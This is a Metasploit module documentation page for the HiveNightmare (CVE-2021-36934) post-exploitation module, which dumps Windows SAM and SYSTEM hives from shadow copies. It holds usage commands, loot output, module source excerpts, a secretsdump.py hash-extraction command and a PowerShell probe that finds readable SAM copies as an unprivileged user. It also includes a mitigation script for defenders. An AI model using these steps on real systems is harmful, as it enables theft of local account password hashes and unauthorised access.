Windows SAM secrets leak - HiveNightmare - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/windows_sam_hivenightmare Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Source code: modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb
Disclosure date: 2021-07-20
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-36934
This module is also known as HiveNightmare or SeriousSAM.
Due to overly permissive ACLs on the SAM and SYSTEM hives in Windows 10 (1809 and later) and Windows 11, it is possible for an unprivileged user to read those files. As the hives are locked while Windows is running, they cannot be read directly. The trick is to take advantage of Volume Shadow Copy, which is generally enabled, and read the copies of the hives held in a shadow copy instead. Once the SAM and SYSTEM files are successfully dumped and stored with store_loot, you can dump the hashes with an external tool such as secretsdump.py.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/windows_sam_hivenightmare
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/windows_sam_hivenightmare
msf post(windows_sam_hivenightmare) > show options
... show and set options ...
msf post(windows_sam_hivenightmare) > set SESSION session-id
msf post(windows_sam_hivenightmare) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/windows_sam_hivenightmare")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Description
Due to overly permissive ACLs on the SAM and SYSTEM hives in Windows 10 (1809 and later) and Windows 11, it is possible for an unprivileged user to read those files. As the hives are locked while Windows is running, they cannot be read directly. The trick is to take advantage of Volume Shadow Copy, which is generally enabled, and read the copies of the hives held in a shadow copy instead. Once the SAM and SYSTEM files are successfully dumped and stored with store_loot, you can dump the hashes with an external tool such as secretsdump.py.
Installation
VSS is probably already enabled on your Windows 10 host. If you want to be sure, follow the steps below:
- Open the Control Panel
- Navigate to System and Security > System
- Select System Protection in the left-hand column
- Check in the Protection Settings list that protection is enabled for the system drive
- Optionally, select Create to "Create a restore point right now...". This is necessary if the module cannot find an existing shadow copy, which can be the case when the Windows instance is brand new
Be aware that you will need Administrator privileges to follow those steps. You can read more here.
Verification Steps
- Start msfconsole
- use post/windows/gather/credentials/windows_sam_hivenightmare
- set ITERATIONS <number> to specify the number of iterations on the file index (default is 10)
- set FILE_INDEX <number> optionally, if you want to target a specific file index instead of iterating over all indexes in a range
- run the module to exploit the vulnerability and potentially leak the SAM and SYSTEM files
Options
ITERATIONS
Set ITERATIONS to specify the number of iterations on the Shadow Copy file index. Windows exposes each shadow copy as a device object named HarddiskVolumeShadowCopy<index>, and the module opens \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<index>\Windows\System32\config\SAM for every candidate index. By default the module brute-forces that index by trying all values between 0 and 10 and keeps the most recently modified copy; raise ITERATIONS if the target has more shadow copies than that.
FILE_INDEX
Set FILE_INDEX if you want to target a specific index instead of the default behaviour, which brute-forces all indexes in the given range.
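The following PowerShell script is an added example and is not part of the Metasploit module; it reproduces, from a plain user prompt on the target, the two conditions the module depends on: that the live hives carry an ACL granting BUILTIN\Users read access (Microsoft's own check is `icacls %windir%\system32\config\sam`), and that at least one HarddiskVolumeShadowCopy<index> device exposes a readable SAM. The second part is the same CreateFile call the module makes through railgun (GENERIC_READ, share mode 0x3, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL), so an index it reports is the value to give FILE_INDEX. Assumptions: Windows PowerShell 5.1 or later, and the module's default range of indexes 0 to 10; the type name HiveNightmare.Native and the variable names are this example's own.

```powershell
# Added example (not the module's code): check the two preconditions for CVE-2021-36934 as a standard user.

# Part 1: does the live hive ACL grant BUILTIN\Users read access?
# The hives are locked, but reading a security descriptor only needs READ_CONTROL,
# which is not subject to sharing checks, so Get-Acl succeeds where Get-Content fails.
$configDir = Join-Path $env:windir 'System32\config'
$usersSid  = 'S-1-5-32-545'   # BUILTIN\Users; compared by SID so the check survives localisation

foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
    $path = Join-Path $configDir $hive
    $acl  = Get-Acl -LiteralPath $path
    $readable = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq $usersSid -and
        (([int]$_.FileSystemRights -band [int][System.Security.AccessControl.FileSystemRights]::ReadData) -ne 0)
    }
    if ($readable) { Write-Host "[!] $path grants read access to BUILTIN\Users (vulnerable ACL)" }
    else           { Write-Host "[+] $path does not grant BUILTIN\Users read access" }
}

# Part 2: which shadow copy index exposes a readable SAM? Same call as the module's check_path().
# P/Invoke is used rather than Get-Content so the \\?\GLOBALROOT device path reaches CreateFileW untouched.
if (-not ('HiveNightmare.Native' -as [type])) {
    Add-Type -Namespace HiveNightmare -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern Microsoft.Win32.SafeHandles.SafeFileHandle CreateFileW(
    string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes,
    uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
'@
}

$GENERIC_READ          = [uint32]0x80000000
$FILE_SHARE_READ_WRITE = 3        # the module passes 0x3
$OPEN_EXISTING         = 3
$FILE_ATTRIBUTE_NORMAL = 0x80
$iterations            = 10       # module default for ITERATIONS (assumed range 0..10)

$found = @()
for ($i = 0; $i -le $iterations; $i++) {
    $shadowPath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i\Windows\System32\config\SAM"
    $handle = [HiveNightmare.Native]::CreateFileW($shadowPath, $GENERIC_READ, $FILE_SHARE_READ_WRITE,
                                                  [IntPtr]::Zero, $OPEN_EXISTING, $FILE_ATTRIBUTE_NORMAL, [IntPtr]::Zero)
    if ($handle.IsInvalid) {
        # Win32 error 5 (ACCESS_DENIED) means the copy exists but its ACL is already fixed;
        # a not-found error means there is no shadow copy with this index.
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        if ($err -eq 5) { Write-Host "[-] HarddiskVolumeShadowCopy$i exists but denies access to SAM" }
        continue
    }
    try {
        # Read the first bytes through the handle: every registry hive starts with the "regf" signature.
        $stream = New-Object System.IO.FileStream($handle, [System.IO.FileAccess]::Read)
        $magic  = New-Object byte[] 4
        [void]$stream.Read($magic, 0, 4)
        if ([System.Text.Encoding]::ASCII.GetString($magic) -eq 'regf') {
            Write-Host "[!] SAM hive readable at HarddiskVolumeShadowCopy$i (candidate for FILE_INDEX)"
            $found += $i
        }
        $stream.Dispose()
    } finally {
        $handle.Dispose()
    }
}
if (-not $found) {
    Write-Host "[*] No readable SAM in indexes 0..$iterations: raise ITERATIONS or create a restore point"
}
```

Run it in the same user context the Meterpreter session has; no elevation is needed for either part, which is exactly what makes the bug useful. If Part 1 reports a restrictive ACL but Part 2 still finds a readable copy, the host was patched after the shadow copy was taken, which is why Microsoft's workaround also deletes existing shadow copies.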
Scenarios
This module was successfully tested on Windows 10 20H2. See the following output:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run
[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >
Then, you can dump the hashes from the leaked files with secretsdump.py, for instance:
python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL
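For the defender's side of the same scenario, the PowerShell script below is an added example (not part of the module or of this page's sources) that applies the workaround Microsoft published for CVE-2021-36934 in KB5005357: re-enable ACL inheritance on the hives, then delete the shadow copies that still contain readable copies of them, and verify with icacls that BUILTIN\Users no longer appears. It assumes an elevated prompt and that %windir% sits on the system drive; deleting shadow copies also deletes system restore points, so check your backup position before running it.

```powershell
#Requires -RunAsAdministrator
# Added example (not the module's code): apply and verify the KB5005357 workaround for CVE-2021-36934.
# Assumption: the hives live on $env:SystemDrive, which is where the module's shadow copies come from.

$configDir   = Join-Path $env:windir 'System32\config'
$systemDrive = $env:SystemDrive   # e.g. C:

# 1. Restore inherited permissions on the hives. The config directory's own ACL is fine;
#    the vulnerable hives had simply lost the inherited ACEs.
icacls "$configDir\*.*" /inheritance:e

# 2. Existing shadow copies still expose the hives with the old, permissive ACL. Delete them;
#    these are the HarddiskVolumeShadowCopy<index> devices the module brute-forces.
vssadmin delete shadows "/for=$systemDrive" /all /quiet

# 3. Verify. The line "BUILTIN\Users:(I)(RX)" must no longer appear for SAM,
#    and no shadow copies should be listed for the system drive.
icacls (Join-Path $configDir 'SAM')
vssadmin list shadows "/for=$systemDrive"

# 4. Optional: take a fresh restore point now that the hives carry the right ACL, so the next
#    shadow copy does not reintroduce the exposure. Windows rate-limits restore point creation
#    (one per 24 hours by default), so this step may be skipped silently.
Checkpoint-Computer -Description 'After CVE-2021-36934 workaround' -RestorePointType MODIFY_SETTINGS
```

Step 2 is the one that is easy to forget: patching the ACL on the live hives does nothing for copies already captured by VSS, so the module keeps working against an "ACL-fixed" host until the old shadow copies are gone.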
Msfconsole Usage
Here is how the windows/gather/credentials/windows_sam_hivenightmare post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/windows_sam_hivenightmare
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show info
Name: Windows SAM secrets leak - HiveNightmare
Module: post/windows/gather/credentials/windows_sam_hivenightmare
Platform: Windows
Arch:
Rank: Normal
Disclosed: 2021-07-20
Provided by:
Kevin Beaumont
romarroca
Yann Castel (yann.castel[at]orange.com)
Module stability:
crash-safe
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_INDEX no Optional index parameter to retrieve a specific Shadow Copy file
ITERATIONS 10 yes Number of iterations on Shadow Copy file index
SESSION yes The session to run this module on.
Description:
Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is
possible for an unprivileged user to read those files. But, as they
are locked while Windows is running we are not able to read them
directly. The trick is to take advantage of Volume Shadow Copy,
which is generally enabled, to finally have a read access. Once SAM
and SYSTEM files are successfully dumped and stored in `store_loot`,
you can dump the hashes with some external scripts like
secretsdump.py
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-36934
https://github.com/GossiTheDog/HiveNightmare
https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
https://github.com/romarroca/SeriousSam
Also known as:
HiveNightmare
SeriousSAM
Module Options
This is a complete list of options available in the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show options
Module options (post/windows/gather/credentials/windows_sam_hivenightmare):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_INDEX no Optional index parameter to retrieve a specific Shadow Copy file
ITERATIONS 10 yes Number of iterations on Shadow Copy file index
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show advanced
Module advanced options (post/windows/gather/credentials/windows_sam_hivenightmare):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/windows_sam_hivenightmare module can do:
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/windows_sam_hivenightmare post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages. Check for the possible causes in the code snippets below, taken from the module source code; this can often help in identifying the root cause of the problem.
GetLastError
Here is a relevant code snippet related to the "GetLastError" error message:
46: ])
47: end
48:
49: def check_path(path)
50: r = session.railgun.kernel32.CreateFileA(path, 'GENERIC_READ', 0x3, nil, 'OPEN_EXISTING', 'FILE_ATTRIBUTE_NORMAL', nil)
51: if r['GetLastError'] == 0
52: return r['return']
53: end
54:
55: nil
56: end
Can't open SYSTEM file!
Here is a relevant code snippet related to the "Can't open SYSTEM file!" error message:
77: read_file(sam_handle)
78: )
79: print_good("SAM data saved at #{path}")
80:
81: handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{index}\\Windows\\System32\\config\\SYSTEM")
82: fail_with(Failure::UnexpectedReply, "Can't open SYSTEM file!") unless handle
83: path = store_loot(
84: 'windows.system',
85: '',
86: session,
87: read_file(handle)
Please specify a non-negative file index!
Here is a relevant code snippet related to the "Please specify a non-negative file index!" error message:
90: print_good('SAM and SYSTEM data were leaked!')
91: end
92:
93: def run
94: if datastore['FILE_INDEX']
95: fail_with(Failure::BadConfig, 'Please specify a non-negative file index!') unless datastore['FILE_INDEX'] >= 0
96:
97: handle = check_path("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{datastore['FILE_INDEX']}\\Windows\\System32\\config\\SAM")
98: if handle
99: print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100: print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
Please specify an iteration number greater than 0!
Here is a relevant code snippet related to the "Please specify an iteration number greater than 0!" error message:
99: print_good("SAM data found in HarddiskVolumeShadowCopy#{i}!")
100: print_good("Retrieving files of index #{index_most_recent_shadow_copy}...")
101: loot_files(handle, datastore['FILE_INDEX'])
102: end
103: else
104: fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0
105:
106: most_recent_time = nil
107: most_recent_shadow_copy = nil
108: index_most_recent_shadow_copy = -1
109:
No Shadow Copy files were found! Maybe you can try again with a greater iteration number...
Here is a relevant code snippet related to the "No Shadow Copy files were found! Maybe you can try again with a greater iteration number..." error message:
127: end
128:
129: if index_most_recent_shadow_copy != -1
130: print_good("Retrieving files of index #{index_most_recent_shadow_copy} as they are the most recently modified...")
131: loot_files(most_recent_shadow_copy, index_most_recent_shadow_copy)
132: else
133: print_error('No Shadow Copy files were found! Maybe you can try again with a greater iteration number...')
134: end
135: end
136: end
137: end
Related Pull Requests
- #15536 Merged Pull Request: Fix HiveNightmare Option Reference
- #15462 Merged Pull Request: [CVE-2021-36934] HiveNightmare aka SeriousSam - SAM hashes leak
References
- CVE-2021-36934
- https://github.com/GossiTheDog/HiveNightmare
- https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652
- https://github.com/romarroca/SeriousSam
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- Kevin Beaumont
- romarroca
- Yann Castel (yann.castel[at]orange.com)
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.